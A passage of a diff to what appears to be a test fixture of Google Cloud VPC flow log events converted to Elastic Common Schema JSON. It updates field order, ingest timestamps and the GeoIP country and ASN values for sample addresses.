"{\"insertId\":\"19im82tfdygzo5\",\"jsonPayload\":{\"bytes_sent\":\"66791\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33690},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565311154Z\",\"packets_sent\":\"355\",\"reporter\":\"SRC\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:06.075665334Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:06.075665334Z", @@ -17772,41 +18630,6 @@ } }, { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, - "destination": { - "address": "10.87.40.76", - "port": 5601, - "domain": "kibana", - "ip": "10.87.40.76" - }, - "source": { - "geo": { - "continent_name": "America", - "country_name": "usa" - }, - "as": { - "number": 15169 - }, - "address": "67.43.156.14", - "port": 54812, - "bytes": 1457, - "ip": "67.43.156.14", - "packets": 7 - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:7gePYXWz+/zKghVHNYgmCfG2ZOE=", - "bytes": 1457, - "transport": "tcp", - "type": "ipv4", - "iana_number": "6", - "packets": 7, - "direction": "inbound" - }, "@timestamp": "2019-06-14T03:50:17.553Z", "ecs": { "version": "1.12.0" @@ -17817,6 +18640,9 @@ "10.87.40.76" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "destination": { "vpc": { @@ -17837,8 +18663,33 @@ } } }, + "destination": { + "address": "10.87.40.76", + "port": 5601, + "domain": "kibana", + "ip": "10.87.40.76" + }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.14", + "port": 54812, + "bytes": 1457, + "ip": "67.43.156.14", + "packets": 7 + }, "event": { - "ingested": "2021-12-09T13:37:46.392155400Z", + "ingested": "2021-12-14T14:43:27.415267528Z", "original": "{\"insertId\":\"19im82tfdygzod\",\"jsonPayload\":{\"bytes_sent\":\"1457\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":54812},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:45:20.708994883Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:45:20.595119257Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:45:20.595119257Z", @@ -17846,6 +18697,18 @@ "id": "19im82tfdygzod", "category": "network", "type": "connection" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "community_id": "1:7gePYXWz+/zKghVHNYgmCfG2ZOE=", + "bytes": 1457, + "transport": "tcp", + "type": "ipv4", + "iana_number": "6", + "packets": 7, + "direction": "inbound" } }, { @@ -17854,11 +18717,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, @@ -17936,7 +18804,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.392160900Z", + "ingested": "2021-12-14T14:43:27.415267917Z", "original": "{\"insertId\":\"19im82tfdygzna\",\"jsonPayload\":{\"bytes_sent\":\"64466\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33562},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:49.549471457Z\",\"packets_sent\":\"363\",\"reporter\":\"SRC\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.500498059Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:39:59.500498059Z", @@ -17958,11 +18826,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, @@ -18034,7 +18907,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.392166400Z", + "ingested": "2021-12-14T14:43:27.415268424Z", "original": "{\"insertId\":\"19im82tfdygzng\",\"jsonPayload\":{\"bytes_sent\":\"174524\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33968,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:37.965294083Z\",\"packets_sent\":\"66\",\"reporter\":\"DEST\",\"rtt_msec\":\"2\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.480272197Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.480272197Z", @@ -18045,9 +18918,39 @@ } }, { + "@timestamp": "2019-06-14T03:50:17.553Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "67.43.156.13", + "10.49.136.133" + ] + }, "log": { "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" }, + "gcp": { + "destination": { + "vpc": { + "project_id": "my-sample-project", + "subnetwork_name": "default", + "vpc_name": "default" + }, + "instance": { + "region": "us-east1", + "project_id": "my-sample-project", + "zone": "us-east1-b" + } + }, + "vpcflow": { + "reporter": "DEST", + "rtt": { + "ms": 91 + } + } + }, "destination": { "address": "10.49.136.133", "port": 52780, @@ -18056,13 +18959,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa", - "city_name": "Boardman", - "region_name": "Oregon" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 16509 + "number": 35908 }, "address": "67.43.156.13", "port": 9243, @@ -18070,6 +18976,16 @@ "ip": "67.43.156.13", "packets": 28344 }, + "event": { + "ingested": "2021-12-14T14:43:27.415268811Z", + "original": "{\"insertId\":\"19im82tfdygzo1\",\"jsonPayload\":{\"bytes_sent\":\"181624065\",\"connection\":{\"dest_ip\":\"10.49.136.133\",\"dest_port\":52780,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":9243},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"simianhacker-demo\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:58.592579489Z\",\"packets_sent\":\"28344\",\"reporter\":\"DEST\",\"rtt_msec\":\"91\",\"src_location\":{\"asn\":16509,\"city\":\"Boardman\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Oregon\"},\"start_time\":\"2019-06-14T03:40:17.183499423Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", + "kind": "event", + "start": "2019-06-14T03:40:17.183499423Z", + "end": "2019-06-14T03:49:58.592579489Z", + "id": "19im82tfdygzo1", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -18081,17 +18997,22 @@ "iana_number": "6", "packets": 28344, "direction": "inbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:17.553Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ - "67.43.156.13", - "10.49.136.133" + "192.168.2.117", + "10.87.40.76" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "destination": { "vpc": { @@ -18108,25 +19029,10 @@ "vpcflow": { "reporter": "DEST", "rtt": { - "ms": 91 + "ms": 36 } } }, - "event": { - "ingested": "2021-12-09T13:37:46.392171800Z", - "original": "{\"insertId\":\"19im82tfdygzo1\",\"jsonPayload\":{\"bytes_sent\":\"181624065\",\"connection\":{\"dest_ip\":\"10.49.136.133\",\"dest_port\":52780,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":9243},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"simianhacker-demo\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:58.592579489Z\",\"packets_sent\":\"28344\",\"reporter\":\"DEST\",\"rtt_msec\":\"91\",\"src_location\":{\"asn\":16509,\"city\":\"Boardman\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Oregon\"},\"start_time\":\"2019-06-14T03:40:17.183499423Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", - "kind": "event", - "start": "2019-06-14T03:40:17.183499423Z", - "end": "2019-06-14T03:49:58.592579489Z", - "id": "19im82tfdygzo1", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "address": "10.87.40.76", "port": 5601, @@ -18147,6 +19053,16 @@ "ip": "192.168.2.117", "packets": 7 }, + "event": { + "ingested": "2021-12-14T14:43:27.415269200Z", + "original": "{\"insertId\":\"19im82tfdygzo8\",\"jsonPayload\":{\"bytes_sent\":\"1460\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"192.168.2.117\",\"src_port\":51348},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:41:20.754300982Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:41:20.630975303Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", + "kind": "event", + "start": "2019-06-14T03:41:20.630975303Z", + "end": "2019-06-14T03:41:20.754300982Z", + "id": "19im82tfdygzo8", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -18158,19 +19074,27 @@ "iana_number": "6", "packets": 7, "direction": "inbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:17.553Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ - "192.168.2.117", - "10.87.40.76" + "10.73.186.17", + "192.168.2.12" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { - "destination": { + "vpcflow": { + "reporter": "SRC" + }, + "source": { "vpc": { "project_id": "my-sample-project", "subnetwork_name": "default", @@ -18181,29 +19105,8 @@ "project_id": "my-sample-project", "zone": "us-east1-b" } - }, - "vpcflow": { - "reporter": "DEST", - "rtt": { - "ms": 36 - } } }, - "event": { - "ingested": "2021-12-09T13:37:46.392177300Z", - "original": "{\"insertId\":\"19im82tfdygzo8\",\"jsonPayload\":{\"bytes_sent\":\"1460\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"192.168.2.117\",\"src_port\":51348},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:41:20.754300982Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:41:20.630975303Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", - "kind": "event", - "start": "2019-06-14T03:41:20.630975303Z", - "end": "2019-06-14T03:41:20.754300982Z", - "id": "19im82tfdygzo8", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "geo": { "continent_name": "Asia", @@ -18226,47 +19129,8 @@ "domain": "infraops-docker-data", "ip": "10.73.186.17" }, - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:I5lhpPeiyo7KchAzF1nMGZkwF4k=", - "bytes": 0, - "transport": "tcp", - "type": "ipv4", - "iana_number": "6", - "packets": 1, - "direction": "outbound" - }, - "@timestamp": "2019-06-14T03:50:17.553Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "10.73.186.17", - "192.168.2.12" - ] - }, - "gcp": { - "vpcflow": { - "reporter": "SRC" - }, - "source": { - "vpc": { - "project_id": "my-sample-project", - "subnetwork_name": "default", - "vpc_name": "default" - }, - "instance": { - "region": "us-east1", - "project_id": "my-sample-project", - "zone": "us-east1-b" - } - } - }, "event": { - "ingested": "2021-12-09T13:37:46.392182800Z", + "ingested": "2021-12-14T14:43:27.415269594Z", "original": "{\"insertId\":\"19im82tfdygzoa\",\"jsonPayload\":{\"bytes_sent\":\"0\",\"connection\":{\"dest_ip\":\"192.168.2.12\",\"dest_port\":44128,\"protocol\":6,\"src_ip\":\"10.73.186.17\",\"src_port\":22},\"dest_location\":{\"asn\":4837,\"city\":\"Binzhou\",\"continent\":\"Asia\",\"country\":\"chn\",\"region\":\"Shandong\"},\"end_time\":\"2019-06-14T03:45:22.081121292Z\",\"packets_sent\":\"1\",\"reporter\":\"SRC\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"infraops-docker-data\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:45:22.080963433Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:45:22.080963433Z", @@ -18274,6 +19138,18 @@ "id": "19im82tfdygzoa", "category": "network", "type": "connection" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "community_id": "1:I5lhpPeiyo7KchAzF1nMGZkwF4k=", + "bytes": 0, + "transport": "tcp", + "type": "ipv4", + "iana_number": "6", + "packets": 1, + "direction": "outbound" } }, { @@ -18282,11 +19158,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, @@ -18364,7 +19245,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.392188500Z", + "ingested": "2021-12-14T14:43:27.415270033Z", "original": "{\"insertId\":\"19im82tfdygzn7\",\"jsonPayload\":{\"bytes_sent\":\"11137\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33968},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:37.965294083Z\",\"packets_sent\":\"95\",\"reporter\":\"SRC\",\"rtt_msec\":\"2\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.480272197Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.480272197Z", @@ -18375,41 +19256,6 @@ } }, { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, - "destination": { - "geo": { - "continent_name": "America", - "country_name": "usa" - }, - "as": { - "number": 15169 - }, - "address": "67.43.156.14", - "port": 54812, - "ip": "67.43.156.14" - }, - "source": { - "address": "10.87.40.76", - "port": 5601, - "bytes": 1776, - "packets": 7, - "domain": "kibana", - "ip": "10.87.40.76" - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:7gePYXWz+/zKghVHNYgmCfG2ZOE=", - "bytes": 1776, - "transport": "tcp", - "type": "ipv4", - "iana_number": "6", - "packets": 7, - "direction": "outbound" - }, "@timestamp": "2019-06-14T03:50:17.553Z", "ecs": { "version": "1.12.0" @@ -18420,6 +19266,9 @@ "67.43.156.14" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "vpcflow": { "reporter": "SRC", @@ -18440,8 +19289,33 @@ } } }, + "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.14", + "port": 54812, + "ip": "67.43.156.14" + }, + "source": { + "address": "10.87.40.76", + "port": 5601, + "bytes": 1776, + "packets": 7, + "domain": "kibana", + "ip": "10.87.40.76" + }, "event": { - "ingested": "2021-12-09T13:37:46.392194Z", + "ingested": "2021-12-14T14:43:27.415270427Z", "original": "{\"insertId\":\"19im82tfdygznf\",\"jsonPayload\":{\"bytes_sent\":\"1776\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":54812,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:45:20.708994883Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:45:20.595119257Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:45:20.595119257Z", @@ -18449,6 +19323,18 @@ "id": "19im82tfdygznf", "category": "network", "type": "connection" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "community_id": "1:7gePYXWz+/zKghVHNYgmCfG2ZOE=", + "bytes": 1776, + "transport": "tcp", + "type": "ipv4", + "iana_number": "6", + "packets": 7, + "direction": "outbound" } }, { @@ -18457,11 +19343,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33564, @@ -18539,7 +19430,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.392199500Z", + "ingested": "2021-12-14T14:43:27.415270824Z", "original": "{\"insertId\":\"19im82tfdygzni\",\"jsonPayload\":{\"bytes_sent\":\"21792\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33564,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.597079770Z\",\"packets_sent\":\"186\",\"reporter\":\"SRC\",\"rtt_msec\":\"340\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.866944869Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.866944869Z", @@ -18550,43 +19441,6 @@ } }, { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, - "destination": { - "geo": { - "continent_name": "America", - "country_name": "usa", - "city_name": "Broomfield", - "region_name": "Colorado" - }, - "as": { - "number": 33652 - }, - "address": "67.43.156.13", - "port": 49438, - "ip": "67.43.156.13" - }, - "source": { - "address": "10.139.99.242", - "port": 9200, - "bytes": 74370, - "packets": 580, - "domain": "elasticsearch", - "ip": "10.139.99.242" - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:Wx9CFh/CGkJ8gWbPZ6ib0K8z+zk=", - "bytes": 74370, - "transport": "tcp", - "type": "ipv4", - "iana_number": "6", - "packets": 580, - "direction": "outbound" - }, "@timestamp": "2019-06-14T03:50:17.553Z", "ecs": { "version": "1.12.0" @@ -18597,6 +19451,9 @@ "67.43.156.13" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "vpcflow": { "reporter": "SRC", @@ -18617,8 +19474,33 @@ } } }, + "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.13", + "port": 49438, + "ip": "67.43.156.13" + }, + "source": { + "address": "10.139.99.242", + "port": 9200, + "bytes": 74370, + "packets": 580, + "domain": "elasticsearch", + "ip": "10.139.99.242" + }, "event": { - "ingested": "2021-12-09T13:37:46.392205Z", + "ingested": "2021-12-14T14:43:27.415271211Z", "original": "{\"insertId\":\"19im82tfdygzns\",\"jsonPayload\":{\"bytes_sent\":\"74370\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":49438,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.220725956Z\",\"packets_sent\":\"580\",\"reporter\":\"SRC\",\"rtt_msec\":\"114\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.398463104Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"locati